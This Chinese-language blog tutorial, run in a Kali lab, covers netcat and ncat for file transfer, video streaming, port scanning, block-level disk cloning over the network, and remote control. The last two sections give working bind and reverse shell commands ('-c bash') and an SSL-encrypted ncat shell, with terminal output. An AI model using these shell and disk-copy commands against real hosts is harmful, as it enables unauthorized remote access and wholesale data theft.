nc远程控制

Published by 王健 on

一、传输文件

发送端:
root@kali:~# touch 1.mp4 ①创建要发送的视频文件
root@kali:~# nc -nv 10.0.0.52 333 < 1.mp4 -q 1 ③执行传输指令,在完成1s后关闭连接
(UNKNOWN) [10.0.0.52] 333 (?) open

接收端:
[root@db2 ~]# nc -lp 333 > 3.mp4 ②将要接收的视频文件以3.mp4命名
[root@db2 ~]# ll ④查看以传输完毕
total 12
-rw-r--r-- 1 root root    0 Oct  4 23:12 3.mp4
-rw-r--r-- 1 root root 8569 Jun 28  2020 txt.txt


发送端:
root@kali:~# touch 2.mp4  ①创建文件
nc -q 1 -lp 222 < 2.mp4 ②准备将要发送的文件等待连接

接收端:
[root@db2 ~]# nc -nv 10.0.0.146 222 > 5.mp4 ③接收文件重命名为5.mp4
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.146:222.
^C  
[root@db2 ~]# 
[root@db2 ~]# ll ④查看
total 12
-rw-r--r-- 1 root root    0 Oct  4 23:12 3.mp4
-rw-r--r-- 1 root root    0 Oct  4 23:31 5.mp4
-rw-r--r-- 1 root root 8569 Jun 28  2020 txt.tx

二、流媒体服务传输

发送端:
cat game.MP4 |nc -lp 333  

接收端:
apt-get update
apt-get install mplayer
nc -nv 10.0.0.52 333 |mplayer -vo x11 -cache 3000 -
root@kali:~# nc -nv 10.0.0.52 333 |mplayer -vo x11 -cache 3000 -
(UNKNOWN) [10.0.0.52] 333 (?) open
MPlayer 1.4 (Debian), built with gcc-10 (C) 2000-2019 MPlayer Team
do_connect: could not connect to socket
connect: No such file or directory
Failed to open LIRC support. You will not be able to use your remote control.

Playing -.
Reading from stdin...
Cache fill:  0.00% (0 bytes)   

libavformat version 58.76.100 (external)
libavformat file format detected.
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]Protocol name not provided, cannot determine if input is local or a network protocol, buffers and access patterns cannot be configured optimally without knowing the protocol
Cannot seek backward in linear streams!
Seek failed
Cannot seek backward in linear streams!
Seek failed
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]stream 0, offset 0x2c: partial file
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]Could not find codec parameters for stream 1 (Video: h264 (avc1 / 0x31637661), none(tv, bt709), 1440x1920, 16281 kb/s): unspecified pixel format
Consider increasing the value for the 'analyzeduration' (0) and 'probesize' (5000000) options
[lavf] stream 0: audio (aac), -aid 0, -alang und
[lavf] stream 1: video (h264), -vid 0
VIDEO:  [H264]  1440x1920  24bpp  60.000 fps  16281.7 kbps (1987.5 kbyte/s)
vo: couldn't open the X11 display ()!
Error opening/initializing the selected video_out (-vo) device.
Clip info:
 major_brand: mp42
 minor_version: 1
 compatible_brands: isommp41mp42
 creation_time: 2021-08-08T08:21:37.000000Z
Load subtitles in ./
Cannot seek backward in linear streams!
Seek failed
Cannot seek backward in linear streams!
Seek failed
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]stream 0, offset 0x2c: partial file
==========================================================================
Opening audio decoder: [ffmpeg] FFmpeg/libavcodec audio decoders
libavcodec version 58.134.100 (external)
Cannot seek backward in linear streams!
Seek failed
Cannot seek backward in linear streams!
Seek failed
[mov,mp4,m4a,3gp,3g2,mj2 @ 0x7f2347b238e0]stream 0, offset 0x2c: partial file
AUDIO: 44100 Hz, 2 ch, floatle, 122.0 kbit/4.32% (ratio: 15256->352800)
Selected audio codec: [ffaac] afm: ffmpeg (FFmpeg AAC (MPEG-2/MPEG-4 Audio))
==========================================================================
AO: [pulse] 44100Hz 2ch floatle (4 bytes per sample)
Video: no video
Starting playback...
A:   0.0 (unknown) of 106.4 (01:46.3) ??,?% 0% 


Exiting... (End of file)

三、端口扫描

root@kali:~# nc -nvz 10.0.0.52 1-1000  #扫描1-1000的端口
(UNKNOWN) [10.0.0.52] 22 (ssh) open

root@kali:~# nc -nvzu 10.0.0.52 1-10 #扫描1-100的udp协议的端口
(UNKNOWN) [10.0.0.52] 4 (?) open
(UNKNOWN) [10.0.0.52] 3 (?) open
(UNKNOWN) [10.0.0.52] 2 (?) open
(UNKNOWN) [10.0.0.52] 1 (?) open

四、远程硬盘克隆

远程电子取证,可以将目标服务器硬盘远程复制,或者内存。

扇区、磁道、删除掉的内容一并复制。硬盘块级别地、镜像地复制。

nc -lp 333 |dd of = /dev/sda 被接收主机开启监听端口
dd if =/dev/sda | nc -nv 10.0.0.52 333 -q l 将被取证的主机的某块硬盘复制

五、远程控制

被控端:
root@kali:~# nc -lp 333 -c bash

控制端:
[root@db2 ~]# nc -nv 10.0.0.146 333
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.146:333.



控制端:
root@kali:~# nc -lp 333 
ls
txt.txt

被控端:
[root@db2 ~]# nc -nv 10.0.0.146 333 -c bash
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Connected to 10.0.0.146:333.

不管是服务端还是客户端,有“-c bash”就是被控的一方

六、加密远程控制–ncat

被控端:
root@kali:~# ncat ncat -c bash --allow 10.0.0.52 -vnl 333 --ssl
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Could not resolve hostname "ncat": Name or service not known. QUITTING.
root@kali:~#  ncat -c bash --allow 10.0.0.52 -vnl 333 --ssl
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: A57B B768 00EA 4919 0956 BAE1 EACA A3CF C5C9 F80B
Ncat: Listening on :::333
Ncat: Listening on 0.0.0.0:333
Ncat: Connection from 10.0.0.52.
Ncat: Connection from 10.0.0.52:42190.

控制端:
[root@db2 ~]# ncat -nv 10.0.0.146 333 --ssl
Ncat: Version 7.50 ( https://nmap.org/ncat )
Ncat: Subject: CN=localhost
Ncat: Issuer: CN=localhost
Ncat: SHA-1 fingerprint: A57B B768 00EA 4919 0956 BAE1 EACA A3CF C5C9 F80B
Ncat: Certificate verification failed (self signed certificate).
Ncat: SSL connection to 10.0.0.146:333.
Ncat: SHA-1 fingerprint: A57B B768 00EA 4919 0956 BAE1 EACA A3CF C5C9 F80B
ls
07.txt
1.txt
2.sh
3.mp4
3.sh
49.txt
4.sh
公共
模板
视频
图片
文档
下载
音乐
桌面
Public

Categories: kali
Tags:

0 Comments

发表评论

Avatar placeholder

邮箱地址不会被公开。 必填项已用*标注

Related Posts

kali

kali安装ftp服务

一、服务端10.0.0.146安装vsftpd服务 二、客户端10.0 Read more…

kali

Nessus扫描

一、下载链接 二、上传至kali上 三、赋予权限 四、安装 五、启动 Read more…

kali

openvas漏洞扫描器

#浏览器输入:https://127.0.0.1:9392 admin Read more…